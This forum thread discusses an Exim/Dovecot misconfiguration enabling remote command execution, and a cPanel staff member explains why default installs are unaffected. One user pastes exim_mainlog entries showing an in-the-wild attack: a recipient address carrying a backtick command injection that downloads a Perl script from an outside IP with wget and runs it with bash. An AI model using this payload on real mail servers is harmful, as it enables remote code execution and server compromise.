Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution

[Domenico]

Did you check this already cPanel? Probably nothing to worry about regarding a default cPanel install but still it is a major bug.

https://www.redteam-pentesting.de/d...nfiguration-leads-to-remote-command-execution

 

[cPanelNick]

We don't use use_shell in exim.conf. The deficiencies of use_shell are already documented in the exim documentation showing this is a security problem when used this way. This is a case of blindly copying the example and not reading the docs that go along with it. It looks like the exim devs has since made the warning stronger and more fiercely worded.

 

[zye]

i noticed
<red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`[email protected]>

exim_mainlog

2013-05-05 04:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`[email protected] <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`[email protected]> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
2013-05-05 08:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`[email protected] <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`[email protected]> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
2013-05-05 14:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`[email protected] <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`[email protected]> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
2013-05-05 23:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`[email protected] <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`[email protected]> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
2013-05-06 08:39:39 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`[email protected] <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`[email protected]> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
2013-05-06 17:39:33 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`[email protected] <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`[email protected]> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
2013-05-07 01:40:27 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`[email protected] <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`[email protected]> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
2013-05-07 10:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`[email protected] <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`[email protected]> R=dkim_lookuphost T=dkim_remote_smtp defer (111): Connection refused

exim_mainlog:2013-05-05 04:39:03 1UYgRb-0003y5-7t example.com [2001:500:88:200::10] Network is unreachable
exim_mainlog:2013-05-05 04:39:24 1UYgRb-0003y5-7t example.com [192.0.43.10] Connection timed out
exim_mainlog:2013-05-05 04:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`[email protected] <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`[email protected]

 

[cPanelNick]

Looks like its out in the wild now. From the old it looks quite unsuccessful.